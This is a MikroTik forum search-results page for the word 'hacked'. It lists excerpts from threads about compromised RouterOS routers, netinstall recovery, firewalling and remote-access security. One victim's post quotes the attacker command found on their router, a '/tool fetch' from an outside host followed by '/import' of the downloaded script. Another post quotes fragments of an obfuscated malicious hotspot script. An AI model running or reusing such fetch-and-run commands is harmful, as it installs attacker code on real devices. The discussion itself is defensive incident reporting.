Community discussions

MikroTik App

Search found 1088 matches: hacked

Searched query: hacked

by Chupaka
Wed Sep 16, 2020 12:03 am
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 198
Views: 56986

Re: v7.1beta2 [development] is released!

my router was hacked on this beta version!

Ip of the malware from Hong Kong
Any details?
by Fopwoc
Tue Sep 15, 2020 11:28 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 198
Views: 56986

Re: v7.1beta2 [development] is released!

my router was hacked on this beta version!

Ip of the malware from Hong Kong
by bpwl
Sun Sep 13, 2020 11:34 am
Forum: General
Topic: Slow routing, fixed by reboot - how to troubleshoot?
Replies: 13
Views: 572

Re: Slow routing, fixed by reboot - how to troubleshoot?

... the ISP router instead also solving the problem? Seems like it is coming from the internet, but you have no tools to see it. A (root kit) hacked router will not show the offending traffic or heavy loaded resources. It will bypass any protection of your router. You could be a botnet victim. ...
by pe1chl
Tue Sep 08, 2020 11:15 am
Forum: Beginner Basics
Topic: Add MGMT Vlan to DMZ
Replies: 13
Views: 449

Re: Add MGMT Vlan to DMZ

... and access the ESXi host they could still access your MGMT network, but the chance of that happening is less than that your hosts itself are hacked (at least when ESXi is kept uptodate).
by davidreaton
Tue Sep 01, 2020 7:19 pm
Forum: General
Topic: Trouble with remote access
Replies: 7
Views: 333

Trouble with remote access

... However, I cannot access it with WinBox. I disabled the firewall rule allowing port 8291 access, because I recall that this simple filter rule was hacked. I can access the router via winBox on my local LAN, but not remorely. I'm missing something, but don't know what. Help appreciated! My Firewall ...
by martking
Mon Aug 24, 2020 7:13 pm
Forum: Scripting
Topic: My Backup file contains malicious scripts
Replies: 4
Views: 462

Re: My Backup file contains malicious scripts

looking at that script id say you have been hacked, if you try to go to a website on port 80 you should get an error page appear
by Sob
Mon Aug 24, 2020 2:28 pm
Forum: Scripting
Topic: My Backup file contains malicious scripts
Replies: 4
Views: 462

Re: My Backup file contains malicious scripts

Was the router hacked in the past and did you clean it without netinstalling? Backup can contain also some deleted data.
by mkx
Fri Aug 21, 2020 3:04 pm
Forum: Beginner Basics
Topic: Remote Management Access using Public IP
Replies: 11
Views: 809

Re: Remote Management Access using Public IP

... as my better half would skin me alive if we were hacked due to me taking shortcuts...........

So your own business-case comes with very hard conditions ;-)
by anav
Fri Aug 21, 2020 1:59 pm
Forum: Beginner Basics
Topic: Remote Management Access using Public IP
Replies: 11
Views: 809

Re: Remote Management Access using Public IP

... just for yourself, then the risk is on you to take. I wouldnt do either of the suggested tricks, as my better half would skin me alive if we were hacked due to me taking shortcuts...........
by r00t
Tue Aug 18, 2020 3:50 pm
Forum: Beginner Basics
Topic: RB411 reactivation...
Replies: 2
Views: 215

Re: RB411 reactivation...

... ROS stable version to it. There is no reason why CPU should be too high, RB411 runs perfectly fine with latest ROS version. It may have been hacked, so always better to netinstall hardware you buy used. If you only use RB411 for bridge + wifi, it's fine for 100Mbit/s link. For 3G modem, you ...
by LittleMan
Tue Aug 18, 2020 12:34 am
Forum: General
Topic: What port do I need to forward for remote access using MirotikApp
Replies: 4
Views: 1065

Re: What port do I need to forward for remote access using MirotikApp

... defeats the purpose of the app, I might as well not use it at all and still use the web interface with the current setup. Have yet to see being hacked with a random DDNS address and a random port, accessed once a month or even less; it's similar chance to hacking the VPN tunnel :) I rekon the ...
by sid5632
Fri Aug 14, 2020 3:52 am
Forum: Beginner Basics
Topic: VNC with MikroTik LMT LTE18 router
Replies: 19
Views: 2606

Re: VNC with MikroTik LMT LTE18 router

This whole thread seems a bit pointless, because you really don't want to be running an unencrypted protocol with poor security open to the world in the first place.
Unless you want to get hacked or have information stolen of course...
by anav
Thu Jul 30, 2020 4:24 pm
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

To the OP, you need to download a recent stable version of the software (long term versions are usually good), and then use the netinstall process to get the router back to a clean mode. Do not open the router to the internet on the input chain and do not use any old passwords for the admin. Also li...
by pe1chl
Thu Jul 30, 2020 12:38 pm
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

Ok that is the full info you should have given in your first post. I presume it is still present in your router? You need to netinstall it with format, and NOT restore a backup. So best is to do a clean configuration. At most you can do a /export before you wipe it and keep it as a guide to remember...
by aditrodostress
Thu Jul 30, 2020 12:06 pm
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

I would like to apologize my mistake. i just want to share that's all
okay so environment from wlan interface.

i dont know how they get in to router but leaving config like this

i give screenshot from log
Screenshot_5.jpg
Screenshot_7.jpg
Screenshot_8.jpg
sorry for troubling you.
by pe1chl
Thu Jul 30, 2020 11:37 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

... from?) with tool fetch. I think originally there was only the screenshot with the environment variables and THAT is not a sign the router was hacked, it is the result of a RouterOS bug. When you have some things a developer did not expect you to do (e.g. renamed wlan1 to something else, or ...
by aditrodostress
Thu Jul 30, 2020 9:46 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

sorry my bad word. le me correct. "similiar case" i juts want to share what happen on my router last day. and found this thread by searching "7wmp0b4s.rsc"
before attack happen i already set only enable winbox service with random port & local ip, filter rule drop port scanner.
by Jotne
Thu Jul 30, 2020 8:17 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

I guess you all had router opened for remote access using winbox, ssh, telnet or web access. Winbox was hacked some time back and are fixed in later version. (lots of scan was done to the winbox port 8291, so 2. in list below would have helped) VPN is the best option for remote ...
by pe1chl
Wed Jul 29, 2020 8:41 pm
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

What do you mean "the same experience"?? That is not the same, it is something completely different!
It is the result of a bug in RouterOS which is triggered by rename of the wireless interface.
by aditrodostress
Wed Jul 29, 2020 7:44 pm
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

hey i also get similiar here my ros is 6.45.9 (long-term)
Screenshot_6.jpg
/tool fetch url=http://spacewb.tech/poll/c59e2b64-8b65-46ed-bcbf-b8ba4c68bd49 mode=http dst-path=7wmp0b4s.rsc
/import 7wmp0b4s.rsc
right now my router reflashed netinstall
by jvanhambelgium
Sun Jul 19, 2020 2:27 pm
Forum: General
Topic: help locating/identifying unknown Mikrotik device
Replies: 5
Views: 1269

Re: help locating/identifying unknown Mikrotik device

... onsite to follow the cable...it should lead to the mysterious box. If the unit is running such old RouterOS it might be completely compromised / hacked if it was ever accessible from the outside world...
by DodoXX
Mon Jul 13, 2020 11:11 am
Forum: Beginner Basics
Topic: Cant netinstall board CRS125
Replies: 0
Views: 123

Cant netinstall board CRS125

Hi, i got probably hacked my router(CA5125-24G-15-AM),it's working but i can't access the router. When i tried to reset, i hold res button(push the res button, plug in and wait) for over 2 min(should be like 10 sec i know) ,but USR1 ...
by adros
Fri Jul 10, 2020 6:58 am
Forum: General
Topic: How secure is my server on an Unsecured VPN
Replies: 1
Views: 461

How secure is my server on an Unsecured VPN

... way too slow. I dont care about securing the VPN data as its just public cameras. If I used an unsecured VPN, will it become easy to get my server hacked or have someone screw up my RouterOS configuration? Thanks Adros
by jvanhambelgium
Sat Jul 04, 2020 10:40 pm
Forum: Beginner Basics
Topic: Am I protected with this settings?
Replies: 34
Views: 4953

Re: Am I protected with this settings?

... had really some flaws in them in the sense that IF you ever exposed the mangement interfaces externally (eg. http/https) your device could be hacked! No login needed ;-) I was under the impression that you had a "default" config (with enabled/active firewall rules rules) hence my remark that ...
by creatin
Tue Jun 30, 2020 12:52 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

Thanks for the tip, Mikrotik on which on which user test is set and to which I'll be connecting by ssh doesn't have any firewalls enabled,
it's running as AP only.
by sindy
Tue Jun 30, 2020 12:11 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

Login to this user will be available only from a specific IP (which can be configured in user properties) through ssh from another Mikrotik Firewall rules are somewhat less prone to vulnerabilities than the per-user address restrictions as the latter work at application level while the former work ...
by creatin
Tue Jun 30, 2020 12:01 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

Agree with you :)

how big of a risk if user test is created on Mikrotik with read rights only, no password.
Login to this user will be available only from a specific IP (which can be configured in user properties) through ssh from another Mikrotik
by anav
Sat Jun 27, 2020 6:57 pm
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

You wont get hacked if you use common sense and stick to the default firewall rules until one knows what one is doing. THe obvious is change password and winbox port and limit access to the router admin on the LAN side. On the wan ...
by creatin
Sat Jun 27, 2020 6:28 pm
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

If you want to detect any intrusion by just a script running on the Mikrotik itself, what will not make you happy is that the fact of the intrusion may not be noticeable in the configuration at all. The configuration is just a front-end to the linux running below, and some vulnerabilities in the pa...
by sindy
Sat Jun 27, 2020 1:28 pm
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

I was thinking of creating a script which would check number of users, their names, number of scripts, when were they created/modified (if possible). Script would run every 30-60 seconds and if there's a change it would send an email notification. If you are creating a honeypot to study malware, th...
by creatin
Sat Jun 27, 2020 12:27 pm
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

I was thinking of creating a script which would check number of users, their names, number of scripts, when were they created/modified (if possible).
Script would run every 30-60 seconds and if there's a change it would send an email notification.
by msatter
Sat Jun 27, 2020 11:59 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

Sorry, removed.
by erlinden
Sat Jun 27, 2020 11:29 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

CPU usage?
And of course you can check the ROS version manually and probably you know if there is any service available on the WAN site.
by creatin
Sat Jun 27, 2020 3:23 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Hacked MTiks, any examples?

Found a lot of topics related to hacking of Mikrotiks. How do you know or suspect your Mikrotik has been hacked or tampered with? Any examples of MTIKs which were hacked or tampered with by someone other than local admin? New scripts were added? New users created or existing ...
by hammer185
Wed Jun 24, 2020 7:57 pm
Forum: General
Topic: Bridge Port Settings Inquiry
Replies: 0
Views: 411

Bridge Port Settings Inquiry

... from the Torch tool that is was the same as the other traffic that went through and that traffic. At first I thought my Mikrotik devices might be hacked because my networking setup should not allow that but then I realized that if the packets were being tagged in a way I am not familiar with to ...
by sutrus
Tue Jun 23, 2020 6:17 pm
Forum: Wireless Networking
Topic: I WANT TO CONNECT 2 MIKROTIK AP RBwAP2nND WIRELESSLY AND DISTRIBUE WIRELESS INTERNET CONNECTIVITY FROM 2 nd AP RBw AP2
Replies: 11
Views: 1657

Re: I WANT TO CONNECT 2 MIKROTIK AP RBwAP2nND WIRELESSLY AND DISTRIBUE WIRELESS INTERNET CONNECTIVITY FROM 2 nd AP RBw

A little off topic. Why are you using a 2 year old RouteOS?
I don't know exactly, but this very old version was hacked.
First update to the latest version 6.47 or 6.45.9 and Windox 3,24.
by k6ccc
Mon Jun 22, 2020 7:24 pm
Forum: Beginner Basics
Topic: Remote management
Replies: 2
Views: 519

Re: Remote management

... improve the security of that. Use of a non-standard port, and restricting access by IP. I still do not recommend doing that. WAY TOO EASY to get hacked. Multi-step Port knocking - preferably in conjunction with non-standard ports and IP restrictions gets better. If you have a computer inside ...
by klaus007
Sun Jun 21, 2020 3:15 pm
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

No not at all. I cannot explain how these scripts were installed on the router (possibly by my wife 😱)
by Jotne
Sun Jun 21, 2020 2:52 pm
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

Did you use the Hotspot function?
by klaus007
Sun Jun 21, 2020 11:11 am
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

Thanks to all of you for your recommendations and analysis! My router is running the latest stable and not open to any service on the Internet. There is only me in the LAN with a strong password and WINBOX. I've already set it up from scratch (including NETINSTALL).
Thanks again and have a nice day!
by Jotne
Sun Jun 21, 2020 10:47 am
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

Some more analyses. I have expanded the script and renamed variables to make it some more readable. Firs script looks for a hotspot user with name Mikroticket and set current time/date and mac to the user. Then it seems to send information about the router (time/date/serial number etc) to an externa...
by Jotne
Sun Jun 21, 2020 9:29 am
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

What version of RouterOS do you have on your router? Can you administrate your router on internet using Winbox (or http/ssh/telnet)? Its clear that this is a hack, since no one would use variable name like this in normal programming: P6oHA7pLvicrO8ub2fa2 :local P6oHA7pLvicrO8ub2fa2 [/ip hotspot user...
by mozerd
Sat Jun 20, 2020 4:52 pm
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

I would suggest that you reset your CCR to factory default and configure from scratch. If you want to be assured that nothing malicious is taking place then run netinstall and that will clean your system properly Its NEVER a good thing to see scripts that YOU did not put into the system .... under t...
by mada3k
Sat Jun 20, 2020 3:14 pm
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

Either that, or some previous owner that used some home-made hotspot-provisioning scripts.

Make sure that you never expose WinBox, API or other services to Internet or users.
by klaus007
Sat Jun 20, 2020 12:54 pm
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Have I been hacked?

Hello! Today I fond on my CCR1009 two scripts and I don't know them. 1. "mkt_sp_login_1" { :local P6oHA7pLvicrO8ub2fa2 [/ip hotspot user get $user comment]; :local t1x3SUqugohIpoc4o3En ([:find $P6oHA7pLvicrO8ub2fa2 "Mikroticket"]); :if ([:typeof $t1x3SUqugohIpoc4o3En]!="nil") do={ :local BuPRup63sWl...
by erlinden
Tue Jun 09, 2020 12:29 pm
Forum: General
Topic: Accessing Mikrotik through internet Behind Bridged Modem
Replies: 3
Views: 538

Re: Accessing Mikrotik through internet Behind Bridged Modem

... internet by now I understand, but you don't want to provide access to Winbox on your WAN port. If a vulnerability is discovered your router can be hacked. Nevertheless...of course it is possible, but security wise incredible stupid.
by eworm
Mon Jun 08, 2020 12:47 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Yes, except that you do not need to update. Just a reboot is sufficient.
by anav
Mon Jun 08, 2020 12:46 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Hi lexell, just to be sure you are saying that one has to rename the WIFI back to their original stock names, before upgrading and then change back after upgrading?
After reading about so many issues I am waiting for the patch LOL
by lexell
Mon Jun 08, 2020 10:17 am
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

shahani seems to have named the likely root cause of this in this ROS v6.47 release thread post : Solution to Error while running customized default configuration script: no such item Whenever you see this error when using wireless devices while booting It's possible you have changed the pre-writte...
by pe1chl
Sun Jun 07, 2020 12:27 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

pe1chl - What is the reason to believe that the router was hacked? Because there was that hack where "upgrade" would always install a fixed version even when it was lower, presumably to get back to a vulnerable version. (a couple of scripts and changed ...
by llubik
Sat Jun 06, 2020 6:23 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

pe1chl - What is the reason to believe that the router was hacked? llubik - Please provide output of these commands - "tool fetch url="http://upgrade.mikrotik.com/routeros/LATEST.6" output=user", ":put [:resolve upgrade.mikrotik.com]". [l@MKT] > tool ...
by pe1chl
Sat Jun 06, 2020 12:48 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

pe1chl - What is the reason to believe that the router was hacked? Because there was that hack where "upgrade" would always install a fixed version even when it was lower, presumably to get back to a vulnerable version. (a couple of scripts and changed ...
by strods
Sat Jun 06, 2020 8:14 am
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

pe1chl - What is the reason to believe that the router was hacked?
llubik - Please provide output of these commands - "tool fetch url="http://upgrade.mikrotik.com/routeros/LATEST.6" output=user", ":put [:resolve upgrade.mikrotik.com]".
by pe1chl
Fri Jun 05, 2020 6:48 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

This likely means your router has been hacked. It is advisable to do a clean netinstall. do you mean netinstal or just Reset Configuration (hw reset and download default configuration)? A clean netinstall = download the netinstall program and ...
by mkx
Fri Jun 05, 2020 6:41 pm
Forum: General
Topic: [CCR1009-7G-1C-1S+] No Backup possible - file operation error
Replies: 1
Views: 588

Re: [CCR1009-7G-1C-1S+] No Backup possible - file operation error

Another possibility is that router has been hacked ... some hacks include pretty well hidden scripts which block certain operations. If this happened in your case, then the only way out is netinstall ...
by llubik
Fri Jun 05, 2020 6:31 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

[/quote]

This likely means your router has been hacked. It is advisable to do a clean netinstall.
[/quote]

do you mean netinstal or just Reset Configuration (hw reset and download default configuration)?
by pe1chl
Fri Jun 05, 2020 5:24 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

Something is wrong somewhere. Manually updated 6.46.3 to 6.46.6

/system package update install
download 6.46.3 and instal . . . :-(
This likely means your router has been hacked. It is advisable to do a clean netinstall.
by jefferyf
Thu Jun 04, 2020 10:41 pm
Forum: General
Topic: PPPoE and OSPF drops
Replies: 18
Views: 3798

Re: PPPoE and OSPF drops

... 10 sessions you don't see this problem? That makes it seem like the source is something else. I wonder if perhaps some malfunctioning or hacked device is creating many connections in the connection tracking table, overwhelming it. Sorry for the delay. Yeah it could be that, I'm in the ...
by mrmut
Mon Jun 01, 2020 8:50 am
Forum: Wireless Networking
Topic: How to enable only-n on CAPsMAN?
Replies: 0
Views: 455

How to enable only-n on CAPsMAN?

... turning off G rates (B were turned off allready) and OFDM was gone. Now I have BW: 1x SGI: 1x HT:0-15 rates only. Did I do this correctly, or I hacked a wrong thing?
by cezars
Mon Jun 01, 2020 12:44 am
Forum: Scripting
Topic: Help with firewall
Replies: 12
Views: 2225

Re: Help with firewall

No I think the OP wants to be hacked, he should find older firmware and just use winbox open to the internet. Seriously, concur with Jotne, PPTP is no easier than more secure protocols to implement. Also, the extra load and config mess ...
by anav
Mon Jun 01, 2020 12:37 am
Forum: Scripting
Topic: Help with firewall
Replies: 12
Views: 2225

Re: Help with firewall

No I think the OP wants to be hacked, he should find older firmware and just use winbox open to the internet. Seriously, concur with Jotne, PPTP is no easier than more secure protocols to implement. Also, the extra load and config mess caused ...
by anav
Sun May 31, 2020 8:43 pm
Forum: Beginner Basics
Topic: Router doesn't appear in Winbox interface despite reset procedure
Replies: 10
Views: 1735

Re: Router doesn't appear in Winbox interface despite reset procedure

The firmware is so old its almost comical if not the fact that you obviously didnt buy it new but from someone second hand.
Download the latest stable software and then USE NETINSTALL to make sure you are starting from a good clean (not hacked) firmware.
Come back when you need assistance after
by anav
Sat May 30, 2020 7:56 pm
Forum: Beginner Basics
Topic: My first Hex, help to config
Replies: 2
Views: 508

Re: My first Hex, help to config

... that is extremely old. Did it come to you already configured? if so, it might be best to do a netinstall process in case the router was ever hacked in the past. Wipes the slate clean so you start fresh. Also some advice I gave to another new MT user. No worries, okay so it is normal at the ...
by Jotne
Wed May 27, 2020 8:08 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Or you can keep the IPSec open but add QoS and give then a very slow connection, like 1kbps.
Also logg all their traffic and see where they go.
You can also redirect port 80/443 to a specific web server, so same web page opens all the time.
by anav
Wed May 27, 2020 4:20 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Ahh okay, i see a log, to know if........... that makes sense.
Then the follow is also valid,
Detect, then block lanip.
Then find out who is pissed off that their internet doesnt work anymore.
I like it!!!
by sindy
Wed May 27, 2020 3:06 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Now, lets get back to the question asked........ ;-P So you are saying it is worth it, or a waste of time......??.... OK, if you put it this way, then no, I don't see much value in using it. Most malware will attack public addresses anyway. Out of curiosity, you may add it an let it log, to see whe...
by Jotne
Wed May 27, 2020 2:46 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Others will say this approach makes no sense, why go through all the hassle of doing this : just drop any packet that is not part of a session or targeted towards non DNAT'ed ports and get on with your life ;-) and don't even bother logging this "noise" that exists "by default" 99.999% of these att...
by anav
Wed May 27, 2020 2:32 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I saw this in best practices wiki, dont use it but do you see value in adding to the default setup..........? This rule just prevents your uplink bandwidth from being wasted by ill-configured software or malware running on devices in your LAN. Let me rephrase my question so it fits the answer... " ...
by sindy
Wed May 27, 2020 2:29 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I saw this in best practices wiki, dont use it but do you see value in adding to the default setup..........?
This rule just prevents your uplink bandwidth from being wasted by ill-configured software or malware running on devices in your LAN.
by anav
Wed May 27, 2020 2:26 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I saw this in best practices wiki, dont use it but do you see value in adding to the default setup..........? add action=drop chain=forward comment="Drop tries to reach non-public addresses from LAN" dst-address-list=not_in_internet in-interface=bridge1 (where the list is the usual bogon list - of c...
by jvanhambelgium
Wed May 27, 2020 2:09 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I don't use "tarpit". It will only consume more resources (cpu/mem) on your side with the idea to slow the attacker down by holding the connection, but... For metered connections, only your upstream ISP can truly provide some useful action. If the packet hits your interface, it consumed already band...
by sindy
Wed May 27, 2020 2:02 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Is there a different mitigation for a "metered" (E.G. 4G subscription) versus an "unmetered" connection (E.G. DSL line, cable modem, FTH, ...) ? The ISP is mostly filtering already quite a lot on mobile connections. Nobody mentioned "tarpit" as protection: https://wiki.mikrotik.com/wiki/DoS_attack_...
by bpwl
Wed May 27, 2020 1:48 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

But I do it purely out of interest ;-) (just like yourself I guess) Is there a different mitigation for a "metered" (E.G. 4G subscription) versus an "unmetered" connection (E.G. DSL line, cable modem, FTH, ...) ? The ISP is mostly filtering already quite a lot on mobile connections. Nobody mentione...
by jvanhambelgium
Wed May 27, 2020 1:30 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I have an access rule that if anyone tries one port that is not open on the outside, he will be blocked for 24 hour on any port. This gives me an access list with from 2000 to 15000 IPs at any time. If this for some reason is me that has been blocked from outside, I can use port knock to whitelist ...
by msatter
Wed May 27, 2020 12:19 pm
Forum: General
Topic: Strange file have in mikrotik
Replies: 2
Views: 494

Re: Strange file have in mikrotik

They are not proud of this but it does exists at least:

https://blog.mikrotik.com/security/

This is the last one who's router was hacked:
viewtopic.php?f=2&t=161521
by Jotne
Wed May 27, 2020 9:13 am
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I have an access rule that if anyone tries one port that is not open on the outside, he will be blocked for 24 hour on any port. This gives me an access list with from 2000 to 15000 IPs at any time. If this for some reason is me that has been blocked from outside, I can use port knock to whitelist m...
by jvanhambelgium
Wed May 27, 2020 7:46 am
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Somedays I think I need a hardware FW in front of my router...If MT can focus on security with every new release, I will stick with them...if not...will be time to give up on MT after 8 years and move onto something else. There is no such thing as "a hardware firewall" . Sure there are brands with ...
by kd2pm2
Wed May 27, 2020 4:41 am
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I had that happen to me a few years ago. Thats when I learned to turn off (after I upgraded my package and firmware) pretty much everything including mac telnet, turning off admin user and firewalling port 8291 from the internet. Since then I get the occasional DNS and port scan attacks but no acces...
by mutluit
Tue May 26, 2020 9:02 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

"Security analysis of recent RouterOS exploits" by Tomas Kirnak (Atris Spol. s r.o., Slovakia) English presentation given on Mar 08, 2019 at the MikroTik User Meeting (MUM) in Vienna, Austria, March 07 - 08, 2019. Video (39 minutes) on Vault7 (CIA/NSA) hacking attacks by some botnets to MikroTik rou...
by mducharme
Tue May 26, 2020 8:35 pm
Forum: General
Topic: PPPoE and OSPF drops
Replies: 18
Views: 3798

Re: PPPoE and OSPF drops

... 10 sessions you don't see this problem? That makes it seem like the source is something else. I wonder if perhaps some malfunctioning or hacked device is creating many connections in the connection tracking table, overwhelming it.
by Jotne
Tue May 26, 2020 1:49 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

However, keep in mind i had a strong password. Strong password is not enough if this was used to administrate the box from outside (internet). Use VPN for administrate your box. If you can not use VPN, use: 1. Use another port than default. 2. Use port knocking. This prevents someone from seeing op...
by Cha0s
Tue May 26, 2020 1:30 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

[joking]
I am using Windows 95, they have been working great for the last 25 years without any updates!
I've also been using no firewall, since firewalls are for newbs.

But, today I logged in only to find out that they were hacked!

How could this have happened???
[/joking]
by bpwl
Tue May 26, 2020 1:02 am
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Are you sure i need to do a clean netinstall to save the device? According to MikroTik i should 1. Upgrade 2. Change Password 3. Make sure winbox is only accessed from my network I just want to make my information right, thanks for all replys and i've already learned alot. See the youtube presentat...
by Defraged
Tue May 26, 2020 12:06 am
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Are you sure i need to do a clean netinstall to save the device?
According to MikroTik i should

1. Upgrade
2. Change Password
3. Make sure winbox is only accessed from my network

I just want to make my information right, thanks for all replys and i've already learned alot.
by mutluit
Sun May 24, 2020 6:13 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

